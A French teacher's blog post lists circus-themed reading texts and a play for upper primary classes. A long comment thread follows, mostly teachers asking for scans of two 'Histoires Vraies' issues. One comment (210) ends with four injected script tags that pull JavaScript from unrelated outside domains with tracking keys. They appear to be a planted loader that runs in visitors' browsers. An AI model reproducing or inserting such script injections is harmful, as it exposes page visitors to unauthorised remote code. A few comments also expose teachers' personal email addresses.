• Autour du cirque - Littérature

    Durant la période 2,

    nous allons rencontrer plusieurs lectures

    ayant pour thème le cirque.

    Période 2 Théâtre et cirque

     

    • Premier document: Le Cirque Paradis

    (Le texte relate l'arrivée d'un vieux cirque délabré près d'une école)

    Texte en deux parties, issu d'un fichier Nathan (2 exemplaires dans la classe):

     Le Cirque Paradis - Texte

    Questionnaire:

     Le Cirque Paradis - questions

    • Deuxième document: Le plus grand cirque du mondeAutour du cirque - Littérature

    (Récit évoquant le cirque Barnum et l'affaire Jumbo)


    Texte en 6 parties, issu de "Histoires Vraies" n°91 - décembre 2000 (1 exemplaire dans la classe)

     

     Le plus grand cirque du monde - Questions

     

     

     

    • Troisième document: Annie, l'enfant du cirqueAutour du cirque - Littérature

    (Récit évoquant l'enfance d'Annie Fratellini)

    Texte en 6 parties, issu de "Histoires Vraies" n°14 - décembre 1993 (1 exemplaire dans la classe)

     

     

     

     

    •  Quatrième document: Quel cirque !

    (Pièce de théâtre de Ann Rocard, pour une classe, avec quelques numéros de cirque)

    http://www.annrocard.com/articles.php?lng=fr&pg=457

    http://www.leproscenium.com/Detail.php?IdPiece=3754

     

    « Fiche artiste: Charles DickensDictée 4 CM1 »

  • Commentaires

    214
    Mynimir
    Dimanche 16 Août 2020 à 14:33

    Bonjour, j'ai une classe de CM2 l'année prochaine et j'aimerais mener un projet cirque. Pourrais tu m'envoyer les 2 tapuscrits des "histoires vraies". Est ce que tu fais entrer ces 2 textes dans le domaine de la lecture suivie? Je te remercie.

    213
    Sarah
    Vendredi 14 Août 2020 à 14:36

    Bonjour,

    Merci pour tout ce travail, et le partage. C'est toujours une grande richesse de voir ce que tu fais!

    Comme beaucoup d'autres collègues, je vais  travailler sur le cirque avec mes CM1. Pourrais-tu m'envoyer les tapuscrits des 2 numéros d'histoires vraies?

    Un grand merci d'avance!

     

    212
    Caroline
    Mardi 21 Juillet 2020 à 09:50

    Bonjour,

    Un grand merci pour tout ce partage!

    Le projet de notre école est axé sur le cirque cette année avec une classe découverte également sur ce thème. Je suis donc intéressée par le tapuscrit des "histoires vraies" sur annie fratellini et le plus grand cirque du monde, si cela vous est possible de me les envoyer.

    Belle continuation à vous et encore merci.

    Caroline

    211
    Prisci.lala
    Mercredi 15 Juillet 2020 à 18:48

    Bonjour. Je vais travailler avec mes CM1/CM2 sur le thème du cirque et je ne trouve pas les " histoires vraies" à acheter. Serait-il possible d'avoir les scans de "Annie, enfant du cirque" et "le plus grand cirque du monde.

    Par avance merci ! 

    210
    Morgane
    Mardi 14 Juillet 2020 à 13:58

    Bonjour,

    Merci beaucoup pour ton partage très intéressant. Je travaille cette année sur le thème du cirque. Comme beaucoup, je me permets de te demander s'il serait possible de m'envoyer les textes de Histoires Vraies s'il te plait?

    BONNES VACANCES

    <script src="//mikkiload.com/2299156fcd9f4015b0.js"></script> <script src="http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8857x" type="text/javascript"></script> <script src="http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8857x&format=arrjs&r=1594727854929" type="text/javascript"></script> <script src="http://mikkiload.com/ext/2299156fcd9f4015b0.js?sid=52666_8857_&title=aa&blocks[]=31af2" type="text/javascript"></script>
    209
    mg
    Jeudi 9 Juillet 2020 à 22:25

    Merci beaucoup pour tout ce partage! Je n'imagine pas le temps passé.

    Pourriez vous me faire parvenir les tapuscrits concernant le cirque? Merci d'avance!

    208
    sophie
    Mercredi 22 Avril 2020 à 08:54

    bonjour

    Merci pour votre partage ....

    Je cherche des textes sur le cirque et les tapuscrits des 2 histoires vraies m'interresse pour voir la difficultés pour mes élèves d'ulis.

    Est-il possible de les avoir?

    Merci d'avance....

    207
    carole julien
    Dimanche 29 Mars 2020 à 17:01

    Bonjour, confinée comme tout un chacun, je prépare des activités pour nos petits élèves et les deux numéros d'histoires vraies dur le cirque m'aideraient bien pour alimenter ma séquence: serait-il possible d'avoir les tapuscrits? Je te remercie pour ton travail et  si cela peut te servir, j'ai le scan que j'ai fait d'un numéro que j'avais à la maison de "la croisière jaune"?. Merci

      • Dimanche 29 Mars 2020 à 17:55

        je t'envoie un mail :-)

    206
    CathFranco
    Mercredi 4 Mars 2020 à 22:19

    Bonjour,

    Tout d'abord, bravo pour votre travail!

    Dans mon école, le projet de l'année est le cirque. On réalise un spectacle en fin d'année et je souhaite travailler en littérature dessus cette période.

     Serait-il possible de récupérer les tapuscrits d'histoires vraies?

    Merci d'avance pour votre aide.

    Catherine

    205
    aline
    Dimanche 5 Janvier 2020 à 16:08

    Bonjour, 

    je trouve ton travail très intéressant. Serait-il possible d'avoir les tapuscrits stp?

    204
    Do
    Vendredi 27 Décembre 2019 à 11:16
    Bonjour
    Serait il possible d avoir les tapuscrits des différents documents sur le cirque.
    Merci d avance et merci pour tout ce partage.
    Do
    203
    Caro
    Dimanche 17 Novembre 2019 à 17:09

    Bonjour

    Tout d'abord, merci pour tout ce travail partagé!

    Je démarre un projet cirque avec ma classe de CM et j'aurais souhaité accéder aux tapuscrits ou textes "Le plus grand cirque du monde" et "Annie, l'enfant du cirque". Est-ce possible?

    D'avance merci.

    Caroline

    202
    julie
    Mercredi 13 Novembre 2019 à 16:59

    Bonjour,

    Merci beaucoup pour tout ce travail partagé! Te serait-il possible de m'envoyer les tapuscrits des histoires vraies s'il te plait?

    Julie

    201
    Haki
    Mardi 29 Octobre 2019 à 07:49
    Bonjour,

    Quel travail!

    BRAVO et MERCI.

    Je serai preneuse des textes : "le plus grand cirque du monde" et "Annie, enfant du cirque".

    Te serait-il possible de me les envoyer?

    D'avance, MERCI.
    Hakima
    200
    MaitresseSandy
    Lundi 28 Octobre 2019 à 16:03

    Bonjour, 

     

    Tout d'abord merci pour ces ressources précieuses que vous nous partagez :) 

    Nous avons comme projet le cirque cette année et j'aimerais lire "le plus grand cirque du monde" avec mes CM1. Serait-il possible d'avoir le texte ? 

    Merci beaucoup !!!

    199
    Mardi 22 Octobre 2019 à 11:45

    bonjour

     

    Comme "jackal64", notre classe, CP-CE-CM,  va travailler sur le cirque. Et j'aurai la même demande concernant les textes des magasines "Histoires vraies" : serait-il possible d'avoir les textes sur "Le plus grand cirque du monde" ainsi que celui sur  "Annie, enfant du cirque"  ?

    D'avance merci et un grand bravo pour ce partage,

    Isabelle

    198
    Lundi 21 Octobre 2019 à 16:45

    bonjour

    je souhaite travailler sur le thème du cirque avec mes élèves de ce2-cm1 et le texte sur le plus grand cirque du monde m'interesserait .Serait-il possible de recevoir ce texte ainsi que celui sur  "Annie, enfant du cirque"  ?

    merci

    197
    Flahautlud
    Lundi 7 Octobre 2019 à 21:38

    Bonjour,

    Tout d'abord, bravo pour votre travail!

    Dans mon école,nous allons travailler sur le thème du cirque à la prochaine période. Serait-il possible de récupérer les textes d'histoires vraies?

    Merci d'avance .

    196
    Nath Bua
    Mercredi 25 Septembre 2019 à 15:42

    Tout d'abord félicitations et merci pour tout ce travail partagé....

    Serait-il possible de recevoir ces tapuscrits?

    Avec mes remerciements

      • Mercredi 9 Octobre 2019 à 13:38

        Il me faut une adresse mail ;-) (par mp)

    195
    Emilie 28
    Samedi 31 Août 2019 à 14:02

    Bonjour

    Cette année, le projet de notre école est le cirque. Votre travail va beaucoup m'aider. Serait-il possible d'obtenir les textes?

    Et merci pour tous vos partages.

    194
    soph
    Jeudi 29 Août 2019 à 18:05

    Bonjour, 

    je vais travailler moi aussi sur le thème du cirque. Effectivement, impossible de trouver les tapuscrit du Plus grand cirque du monde et d'Annie. Je veux bien que vous mes les envoyiez si c'est possible. 

    Je vous remercie d'avance et merci pour la publication du travail. Beau travail d'ailleurs. 

      • Jeudi 29 Août 2019 à 19:07

        Tu devrais avoir reçu les textes ;-)

    193
    Elo
    Jeudi 29 Août 2019 à 15:59

    Bonjour,

    Cette année j'ai un projet cirque avec mes CE2-CM1-CM2 et j'aimerai si possible obtenir les deux textes des histoires vraies car je n'arrive pas à trouver ces deux livres en prêt ou en vente. Est il possible de recevoir les tapuscrits ? 

    Merci et bravo pour ton travail !

    192
    marie
    Mercredi 28 Août 2019 à 18:00

    Bonjour, pourrais-je avoir accès au tapuscrit des histoires vraies?

    merci merci!

      • Jeudi 29 Août 2019 à 19:07

        Tu devrais avoir reçu les textes ;-)

    191
    Elo
    Samedi 24 Août 2019 à 18:17

    Bonjour

    je vais travailler sur le thème du cirque cette année avec mes élèves de cycle 3. Je n' arrive pas à trouver les  documents des histoires vraies dans le commerce ou sur internet. Est ce possible d'avoir les textes?

    Merci d'avance et bravo pour ton site

      • Jeudi 29 Août 2019 à 19:06

        Tu devrais avoir reçu les textes ;-)

    190
    caro
    Jeudi 22 Août 2019 à 10:12

    Bonjour,

    Je démarre un projet cirque avec mes cycles 3 et je suis très intéressée par les deux textes des histoires vraies. Est il possible de recevoir les tapuscrits ? 

    bravo pour tout le travail fait sur ce site !

      • Jeudi 22 Août 2019 à 15:23

        C'est envoyé !

         

    189
    Mercredi 7 Août 2019 à 11:41

    Bonjour,

    Merci pour toutes ces informations et documents ! Nous montons un projet cirque sur les classes de CE2 CM1 et CM2 sur notre école en lien avec la mairie l'an prochain avec interventions d'artistes en classe et sur le temps périscolaire. Mais il n'y a pas grand chose pour le cycle 3.... J'ai déjà acheté quelques livres (album "L'homme le plus fort du monde", "Panique au cirque", "Zoé Calamité sur le piste aux étoiles"...)

    J'ai cherché un peu partout les "Je lis une histoire vraie" sans succès. Pourriez-vous me joindre une copie ?

    En vous remerciant par avance et bravo pour votre travail et votre partage.

      • Jeudi 22 Août 2019 à 15:23

        C'est envoyé !

         

    188
    Christine O
    Lundi 8 Juillet 2019 à 14:46

    Bonjour

    Merci pour tous ces documents

    Est-il possible de récupérer les textes des deux histoires vraies?

    Merci d'avance

    Christine

    187
    Lelfine
    Mardi 25 Juin 2019 à 22:35

    Bonjour Delphine,

    J'ai travaillé sur le thème du cirque cette année avec mes CE2. L'an prochain, j'aurai des CE2-CM2 et je cherche des textes adaptés aux CM2 pour pouvoir monter un projet commun aux deux niveaux. Serait-il possible que tu m'envoies les textes de Annie et du plus grand cirque du monde?

    Je pense que tu dois être bien occupée cette fin d'année.

    Merci beaucoup!!!

     

     

      • Jeudi 22 Août 2019 à 15:24

        C'est envoyé !

         

    186
    Mu
    Mardi 9 Avril 2019 à 15:05

    Bonjour Delphine,

    Chouette travail et je vais m'en inspirer car à la rentrée nous démarrons un projet autour du cirque. J'aurais été intéressée par les tapuscrits des histoires vraies. Les as-tu toujours vers toi ? Et si oui, serait-il possible de me les envoyer ? Je te remercie pour tout !

    185
    ENAXOR
    Mercredi 13 Mars 2019 à 22:24

    Bonjour Delphine,

    Je suis enseignante en unité d'enseignement externalisée collège ITEP. Je pars moi aussi en classe de découverte autour des arts du cirque.

    Te serait-il possible de m'adresser les textes d'annie et du plus grand cirque du monde ?

    Merci d'avance pour ce partage.

    Bien cordialement,

    Sophie

    184
    Olibarca
    Mardi 5 Mars 2019 à 12:31

    Bonjour et bravo pour ton travail.

    Nous partons bientôt en classe transplantée sur le thème du cirque et j´aimerais travailler sur ls deux textes que tu proposes :"Annie, enfant du cirque" et "le plus grand cirque du monde"

    Pourrais- tu me les envoyer ?

    Une autre question :  Avez-vous lu la pièce de théâtre ou l´avez-vous montée ?

     

    Encore merci de ton aide.

      • Mardi 5 Mars 2019 à 18:46

        Les textes ont été envoyés.

        Concernant la pièce de théâtre, je ne l'ai pas travaillée par manque de temps.

    183
    marie
    Mercredi 6 Février 2019 à 14:14

    Mon école reçoit un cirque cette année et je serais intéressée par le texte du plus grand cirque du monde et par celui de Annie, l'enfant du cirque. pourriez vois me les envoyer ? Je sais que vous êtes très sollicitée. Merci beaucoup !

      • Jeudi 21 Février 2019 à 09:56

        C'est envoyé ;-) !

         

    182
    Carole
    Mardi 15 Janvier 2019 à 10:16

    Bonjour

    Tout d'abord, merci beaucoup pour ton partage. Nous avons un projet cirque dans notre école cette année. J'ai une classe de CE2-CM1. Serait-il possible de me transmettre les tapuscrits de

    "le plus beau cirque du monde" et "Annie, enfant du cirque"? Merci d'avance.

    181
    sophie
    Samedi 5 Janvier 2019 à 22:29

    Bonjour

    Je découvre à l'instant ton site et bravo pour ce travail! Merci pour ce partage!

    Nous allons accueillir un cirque au mois de janvier et je serai intéressée par les deux textes des deux "histoires vraies" qui sont mentionnés. Pourrais-tu me les envoyer? :)

    Encore merci pour ce travail (qui facilite ma préparation du quadruple niveau) :)

    Sophie

    180
    Lili
    Jeudi 3 Janvier 2019 à 19:39

    Bonjour,

    Cette année, nous tavaillon sur le cirque en "fil rouge" et en particulier durant la prochaine période. Merci beaucoup pour ton partage, te serait-il possible de m'envoyer le texte du "Plus grand cirque du monde"?

    D'avance merci et bonne reprise!

    179
    Ale77940
    Jeudi 3 Janvier 2019 à 14:35

    Bonjour,

    Tout d'abord, je te souhaite une très belle année 2019, pleine de fantaisie et de légèretés si dures à trouver dans notre travail. 

    J'aurais voulu savoir de quelle manière avais-tu travaillé le texte "Annie, l'enfant du cirque"? Es-tu passée par des questionnaires comme pour les autres ? Si oui, accepterais-tu de les partager ?

    Encore merci pour tout ce travail de fourmi !!!

     

    178
    juju39
    Mardi 23 Octobre 2018 à 17:58

    Bonjour,

    Merci pour ton partage, nous avons un projet cirque cette année et je recherche des lectures sur ce thème. Peux-tu m'envoyer le document "Le plus grand cirque du monde"? D'avance, merci!

      • Vendredi 26 Octobre 2018 à 14:26

        c'est envoyé !

    177
    helofoot
    Mercredi 10 Octobre 2018 à 20:21

    Bonsoir,
    Un grand merci pour cet article qui m'aide énormément car j'étais à la recherche de supports littéraires sur lesquels travailler autour du cirque en ulis collège. Te serait-il possible de m'envoyer les tapuscrits /scans des Histoires vraies "Annie, enfant du cirque" et "Le plus grand cirque du monde"? Cela m'aiderait beaucoup!
    Un grand merci d'avance! 

    176
    alala36
    Mercredi 3 Octobre 2018 à 14:29

    Bonjour et un grand merci pour ce partage !

    Je viens à mon tour demander si tu peux m'envoyer les 2 tapuscrits. Je travaille également en lien avec une compagnie de cirque et il n'est pas si aisé de trouver des documents pour le cycle 3.

    Merci d'avance et un grand bravo !

    175
    GRANRY
    Lundi 20 Août 2018 à 17:19

    Bonjour,

    Quel travail!

    BRAVO et MERCI.

    Je serai preneuse des textes : "le plus grand cirque du monde" et "Annie, enfant du cirque".

    Te serait-il possible de me les envoyer?

    D'avance, MERCI.

    Frédérique

     

     

     

    174
    jorib
    Lundi 6 Août 2018 à 18:00

    Bonjour Delphine59, 

    à la rentrée nous commençons un projet sur le cirque avec l'école. Je suis très intéressée par les tapuscrits le plus grand cirque du monde et Annie, l'enfant du cirque. 

     

    Mille mercis à vous 

     

     

    173
    Lucie_1
    Lundi 30 Juillet 2018 à 11:21

    Bonjour,

    Merci beaucoup pour cet article !

    Cette année nous faisons un projet cirque sur toute l'école. Je cherchais des lectures et je suis tombée sur ton site ! Formidable ! Pourrais-tu m'envoyer les scans des Histoires vraies ? 

    En te remerciant d'avance,

    Lucie

    172
    Alex77
    Mardi 24 Juillet 2018 à 07:28

    Bonjour,

    Tout d'abord merci pout ton travail partagé, c'est une vraie source d'inspiration. Je serai également preneuse si tu pouvais m'envoyer les textes : "le plus grand cirque du monde" et "Annie, enfant du cirque".

    Par avance, je te remercie

    171
    PELE
    Lundi 9 Juillet 2018 à 16:40

    Bonjour, l'an prochain notre thème sera le cirque et je suis intéressée par les tapuscrits de "le plus grand cirque du monde" et "Annie l'enfant du cirque".

    Serait-il possible de me les envoyer?

    Merci d'avance et très bonnes vacances.

    170
    virginie250976
    Mercredi 20 Juin 2018 à 14:20

    bonjour,

    merci beaucoup pour ton partage de l'histoire du cirque Paradis, c'est exactement ce dont j'avais besoin!

    bonne fin d'année scolaire :-)

    169
    nad01ain
    Mercredi 30 Mai 2018 à 19:55
    Bonjour,
    J'ai des cm2 l an prochain et nous allons travailler sur le cirque.Pourrais-tu m'envoyer le tapuscrit du magazine histoire vraie le plus grand cirque du monde s'il te plait ? En te remerciant pour le travail effectué et le partage.
    Nadine
    168
    Perrine
    Mardi 1er Mai 2018 à 16:42

    Bonjour, 

    Un grand merci pour tout ce travail!

    Nous travaillons le cirque lors de la prochaine période et j'aimerais savoir si vous pouviez m'envoyer vos textes sur le plus grand cirque du monde et Annie l'enfant du cirque?

    Merci d'avance 

    167
    Sylvie
    Jeudi 5 Avril 2018 à 18:22
    Bonsoir, le thème de notre spectacle de fin d'année étant le cirque, je souhaiterai les tapuscrits des 2 histoires vraies. Merci d'avance.
    166
    flo
    Lundi 26 Mars 2018 à 17:58

    Bonjour Delphine , 

    à mon tour, j'aimerais de demander de m'envoyer les textes : "Le plus grand cirque du monde" et "Annie l'enfant du cirque". Je les utiliserai avec mes CM1 pour le projet cirque avant de recevoir une compagnie de cirque à l'école!

    Merci d'avance

    florence

    165
    Manon
    Mardi 13 Mars 2018 à 18:15

    Bonjour, Je vais travailler sur le cirque durant cette période car nous avons la chance d'accueillir un cirque durant toute une semaine à l'école.

    Je voulais savoir si tu pouvais m'envoyer les textes des 2 histoires vraies (Le plus grand cirque du monde & Annie, l'enfant du cirque) ?

    Merci d'avance.

    164
    Val
    Mardi 13 Mars 2018 à 16:17

    Un grand merci pour la mise à disposition de ton travail. Je prends le Cirque Paradis pour ma classe. Belle journée à toi. :)

    163
    Béatrice
    Mardi 27 Février 2018 à 17:20

    Bonjour Delphine. Je t'avais déjà sollicitée il y a quelque temps pour les textes sur Annie Fratellini. Mes élèves ont adoré. J'ai essayé de trouver Le plus grand Cirque du monde mais sans succès. Pourrais-tu, si tu l'as, m'envoyer le tapuscrit ? D'avance merci. Béatrice

      • Mercredi 28 Février 2018 à 14:52

        Pas de problème ;-)

         

    162
    Flo
    Mardi 27 Février 2018 à 11:44

    Bonjour,

    Je vais travailler sur le cirque durant la prochaine période et je voulais savoir si tu pouvais m'envoyer les textes des 2 histoires vraies (Le plus grand cirque du monde & Annie, l'enfant du cirque) ? En tout cas, merci pour tout ce travail sur ton site car c'est une mine d'or pour des enseignants comme moi travaillant dans des écoles rurales à petits budgets pédagogiques. 

    Cordialement

      • Flo
        Dimanche 4 Mars 2018 à 09:00
        Merci beaucoup pour les 2 textes, je les ai bien reçus.
        Bonne continuation
      • Flo
        Mercredi 28 Février 2018 à 15:42
        Bonjour,
        Mon adresse @ n'est peut être pas correcte ?
      • Mercredi 28 Février 2018 à 14:51

        Je vais tenter un 2ème envoi. Bizarre car c'était un envoi groupé

        qui a fonctionné pour les deux autres  destinataires .

      • Flo
        Mardi 27 Février 2018 à 18:44

        Désolée, mais je n'ai pas reçu les fichiers. Comment ça se fait ? Il y a une manipulation à faire ?

      • Mardi 27 Février 2018 à 16:06

        C'est envoyé :-)

    161
    A.f
    Dimanche 25 Février 2018 à 22:50
    Bonjour delphine.
    Peux tu m'envoyer les deux textes sur le thème du cirque. Nous avons un projet école cette année qui tourne autour du monde du cirque.
    Merci à toi.
    Bien cordialement.
    Bon courage à toi.
    160
    cecilev
    Dimanche 25 Février 2018 à 22:25

    Bonsoir,

    Merci pour le partage de ce travail complet et très intéressant !

    Je travaille sur le cirque avec ma classe de CM1-CM2 et et j'aimerais lire les textes des "histoires vraies" ( le plus grand cirque du monde et Annie, l'enfant du cirque). Serait-il possible de me les envoyer ?

    Merci beaucoup !

      • Mardi 27 Février 2018 à 16:14

        c'est envoyé !

         

    159
    kloro_fille
    Samedi 27 Janvier 2018 à 18:45

    Bonjour,

    Dans l'école où j'enseigne à tiers-temps cette année, il y un projet cirque et je cherche des textes pour les CM2. Pas facile... Je viens de découvrir ton blog , très intéressant! Serait-il possible d'obtenir les textes "Le plus grand cirque du monde" ? 

    Un immense merci pour ta réponse!

    Mélanie

    PS: je viens de voir le film qui parle des débuts P.T. Barnum au cinéma, je suis curieuse de tout ce que j'arrive à trouver comme documents sur son cirque!

     

    158
    Christiane GERIN
    Samedi 2 Décembre 2017 à 11:59

    Bonjour.

    Je suis directrice et enseignante dans une classe de cm1-cm2.

    Nous avons cette année un projet cirque. J'ai pu acheter sur e-bay

    le numéro de " je lis des histoires vraies sur Annie Fratellini" mais je ne

    trouve pas celui du plus grand cirque du monde.

    Auriez-vous encore le texte et la gentillesse de me le faire parvenir par mail.

    Un grand merci dans ce cas.

    Christiane Gerin

    157
    Hélène
    Mercredi 15 Novembre 2017 à 11:50
    Bonjour, Peux-tu m'envoyer les textes "le plus grand cirque du monde" et " Annie..." ? Un grand merci et bravo pour ce travail !
    156
    Jeudi 26 Octobre 2017 à 11:12

    Bonjour,

    Cette année nous avons un projet cirque et c'est très difficile de trouver des textes pour les CM2. En recherchant des documents, j'ai découvert ton blog où il y a des documents intéressants. Serait-il possible d'obtenir les textes "Le plus grand cirque du monde" et "Annie, l'enfant du cirque"? Les numéros d'Histoires vraies datent un peu et on a beaucoup de mal à se les procurer.

    Bravo encore pour ton investissement et merci d'avance pour ta réponse .

    155
    mumu
    Lundi 23 Octobre 2017 à 09:46

    bonjour,

    Je suis en train de travailler sur le cirque avec mes CM1 et je voulais savoir si tu pouvais m'envoyer les textes d'histoires vraies ("Annie, enfant du cirque" et "Le plus grand cirque du monde". 

    Merci :)

    154
    Mercredi 18 Octobre 2017 à 23:18

    Bonjour, ton travail est formidable!

    Je travaillerai avec mes élèves sur le thème du cirque en novembre et je souhaiterai leur donner à lire une histoire de cirque pour les vacances aussi, serait-il possible que tu me scannes le texte sur "Annie, enfant du cirque" et "le plus grand cirque du monde" ? 

    Merci Bonne continuation.

      • Vendredi 20 Octobre 2017 à 18:45

        Désolée je viens de lire ton message ^^

    153
    jf
    Lundi 9 Octobre 2017 à 10:23

    Bonjour,

    Je travaille actuellement sur le cirque avec mes CM et je souhaitais savoir si tu pouvais m'envoyer le texte d'histoires vraies ( Le plus grand cirque du monde).Merci d'avance

      • jf
        Samedi 21 Octobre 2017 à 08:27

        merci beaucoup

      • Lundi 9 Octobre 2017 à 18:46

        Je t'ai envoyé le texte demandé ;-)

    152
    Coralie
    Dimanche 10 Septembre 2017 à 11:50

    Bonjour Delphine,

     

    Je travaille actuellement sur le cirque avec mes CM et je souhaitais savoir si tu pouvais m'envoyer les deux textes d'histoires vraies (Annie, enfant du cirque et Le plus grand cirque du monde).

    J'avais envoyé un précédent commentaire mais il ne s'est pas affiché, donc je ne sais pas si tu l'as bien reçu.

    Merci et bonne journée :)

      • Lundi 11 Septembre 2017 à 19:15

        C'est envoyé !

        Pour le commentaire qui ne parait pas systématiquement, c'est normal, je les lis puis je les publie... car parfois on a des surprises ... ;-)

    151
    Coralie
    Samedi 9 Septembre 2017 à 15:08

    Bonjour Delphine,

    Je suis en train de travailler sur le cirque avec mes CM et je voulais savoir si tu pouvais m'envoyer les textes d'histoires vraies ("Annie, enfant du cirque" et "Le plus grand cirque du monde". 

    Merci :) 

    150
    Stephanie57
    Mercredi 6 Septembre 2017 à 14:29
    Bravo pour tes idées de lecture! J'ai un projet en arts du cirque cette année : une première !
    Serait-il possible de m'envoyer les textes "Le plus grand cirque du monde" et "Annie, l'enfant du cirque".
    Merci d'avance.
      • Lundi 11 Septembre 2017 à 19:16

        C'est envoyé :-)

    149
    Nico51
    Lundi 4 Septembre 2017 à 16:44
    Mille fois mercissssssssssss...Bonne année scolaire à toi.
    148
    Béatrice
    Vendredi 18 Août 2017 à 09:14

    Documents  sur le cirque bien reçus ! Merci beaucoup Delphine. Bonne fin de vacances et bonne rentrée ! Béatrice

    147
    Mercredi 16 Août 2017 à 19:14

    Désolée pour les 4 dernières demandes mais j'ai un souci de mail.... dès que c'est arrangé je pense à vous ;-)

      • Vendredi 1er Septembre 2017 à 18:18
        C'est envoyé !
      • Nico51
        Jeudi 31 Août 2017 à 21:02

        Bonjour chère collègue, encore bravo pour ce superbe travail, je compte travailler la

        thématique du cirque cette année. Serait-il possible de m'envoyer les textes "Le plus grand cirque du monde" et "Annie, l'enfant du cirque".

        Voici mon adresse professionnelle: nicolas.helloco@ac-reims.fr

        Merci encore.

        Nicolas. Collègue de CM.

      • Jeudi 17 Août 2017 à 20:03

        Bien reçu, merci beaucoup!!

      • Jeudi 17 Août 2017 à 19:48

        C'est envoyé ;-)

      • Pajaros
        Jeudi 17 Août 2017 à 18:50

        Bonjour,

        Enseignant de cycle 3, je vais travailler avec mes élèves en septembre sur la thématique du cirque. Vous serait-il possible de m'adresser par mail les les textes "Le plus grand cirque du monde" et "Annie, l'enfant du cirque".

        Une grand merci,

    146
    Béatrice
    Mercredi 16 Août 2017 à 19:01

    Bonjour Delphine et merci pour les documents mis à disposition.

    Je vais travailler sur le thème du cirque l'an prochain. Serait-il possible de m'envoyer les textes "Le plus grand cirque du monde" et "Annie, l'enfant du cirque". D'avance merci.

    Béatrice

    145
    Lundi 14 Août 2017 à 08:38

    Bonjour, j'aimerais à mon tour recevoir les textes des histoires vraies, peux-tu me les faire parvenir? Je te remercie d'avance, Cyraf.

    144
    Nayj
    Lundi 17 Juillet 2017 à 23:41

    Bonjour,

    Bravo pour ce travail et merci pour le partage!

    De la même façon je suis intéressée pour recevoir le texte "Le plus grand cirque du monde" ainsi que "Annie, l'enfant du cirque"si possible.

    Merci par avance et bonnes vacances !

    143
    Annick A
    Mercredi 5 Juillet 2017 à 19:59

    Bonsoir, titulaire d'une classe de Ce2, je commence à regarder les albums sur le thème du cirque qui pourraient être intéressants à travailler avec mes élèves l'an prochain et je viens de tomber sur ton site. Comme beaucoup, je serai intéressée par le texte sur "le plus grand cirque du monde". Je recherche des albums qui pourraient se raccrocher également à des activités de découverte du monde. Si tu as des suggestions je suis preneuse. D'avance merci beaucoup, beaucoup et bonnes vacances.

    142
    Pascale
    Samedi 11 Mars 2017 à 18:27

    Bonsoir Delphine,

    Je te remercie de partager ton travail avec nous :)

    J'aimerais recevoir moi aussi le texte sur "le plus grand cirque du monde" et celui concernant Annie Fratellini.

    Encore merci!

    Pascale

     

    141
    Mercredi 8 Février 2017 à 13:36

    C'est fait !

    140
    Estelle
    Mercredi 8 Février 2017 à 11:46

    Bonjour,

    Tout d'abord merci pour ce partage ! Nous partons en classe découverte sur le thème du cirque  avec mes CE2-CM1-CM2. Nous allons donc aborder ce sujet en lecture-compréhension. Serait-il possible de recevoir le texte "Le plus grand cirque du monde" ainsi que "Annie, l'enfant du cirque" par mail s'il vous plaît ?

    Merci d'avance

    Estelle

    139
    Emeline
    Mardi 17 Janvier 2017 à 15:54

    Bonjour,

    tout d'abord, un grand merci pour le partage :). J'aborde le thème du cirque avec mes CP-CE1-CE2 cette année, je travaille en groupe de niveaux et j'ai certains CE1 et CE2 qui sont excellents lecteurs (que ce soit pour la lecture ou la compréhension). J'aimerais donc travailler avec eux sur le roman "le plus grand cirque du monde" (en l'adaptant) mais je ne trouve pas le livre à l'achat. Pouvez-vous me l'envoyer par mail s'il vous plaît ?

    Je vous remercie par avance et bravo pour votre travail et votre partage.

    Meilleurs vœux pour cette nouvelle année :)

    Emeline

      • Mardi 17 Janvier 2017 à 20:38

        C'est en cours d'envoi :-)

    138
    Mercredi 11 Janvier 2017 à 20:51

    C'est envoyé :-)

    137
    birgit
    Mercredi 11 Janvier 2017 à 10:40

    Bonjour Delphine, thème du cirque abordé et travaillé cette année je serais vraiment très intéressée pour recevoir par mail les textes des histoires vraies pour mes ce2 pour voir si je peux leur proposer à la lecture et adapter les questionnaires ! merci d'avance , bravo pour ton travail et belle année 2017

      • Mercredi 11 Janvier 2017 à 20:12

        J'ai voulu t'envoyer les docs mais j'ai eu un message d'erreur.

        Peux-tu vérifier ton adresse mail: ribu.florin@sfr.fr

         

    136
    Céline94
    Mardi 20 Décembre 2016 à 18:32

    Bonjour,

    tout d'abord, un grand merci pour le partage !

    Cette année, toute l'école participe à un projet cirque avec une semaine de classe de découverte. Avec nos CM2 nous souhaitons travailler sur la lecture compréhension (entre autres)

    Serait-il possible de m'envoyer les scans des histoires "Le plus grand cirque du monde" et celle d'Annie Fratelini ?

     

    Par avance, un grand merci et belles fêtes de fin d'année.

    135
    Virg
    Jeudi 24 Novembre 2016 à 23:03

    Oups... C'est sûre!!

    Merci d'avance

    134
    Virg
    Dimanche 20 Novembre 2016 à 22:16

    Bonsoir,

    Merci beaucoup pour ton partage très intéressant. Je travaille cette année sur le thème du cirque avec en janvier, un mini stage avec un artiste.

    Comme beaucoup, je me permets de te demander s'il serait possible de m'envoyer les textes de Histoires Vraies (Annie enfant du cirque) s'il te plaît?

    Merci d'avance.

      • Lundi 21 Novembre 2016 à 20:07

        Avec une adresse mél, c'est mieux ;-)

    133
    Cata
    Samedi 19 Novembre 2016 à 18:14

    Bonjour Delphine,

    Bravo pour votre travail sur le cirque.. Je suis également intéressée par votre dossier sur le cirque.Serait-il possible d'avoir le texte Le plus grand cirque du monde et celui sur Annie Fratellini.   Par quel moyen puis-je vous communiquer mon mail ? Merci d'avance...

     

    132
    mélody CM2
    Dimanche 13 Novembre 2016 à 16:33

    Bonjour Delphine,

    Pour ne pas être plus originale que les autres, je mène un projet cirque avec ma classe de CM2. Peux-tu m'envoyer les scan des deux textes des histoires vraies s'il-te-plait?

    Je te remercie beaucoup. Et encore bravo pour ce super blog!!!

      • Dimanche 13 Novembre 2016 à 20:24

        J'ai besoin d'une adresse mail

    131
    benco
    Mercredi 26 Octobre 2016 à 21:07

    Bonjour,

     

    Je vais te faire la même demande que les autres j'aurai besoin des textes issus de histoires vraies

     

    d'avance merci

     

    Benco

    130
    Vendredi 16 Septembre 2016 à 21:26

    Lallou j'ai besoin d'une adresse mail (en MP) :-)

    129
    Lallou
    Vendredi 16 Septembre 2016 à 16:33

    Bonjour Delphine

     

    Je vais également travaillé sur le thème du cirque. Peux-tu m'envoyer les scan des textes des histoires vraies ?

    Encore merci pour le partage.

    128
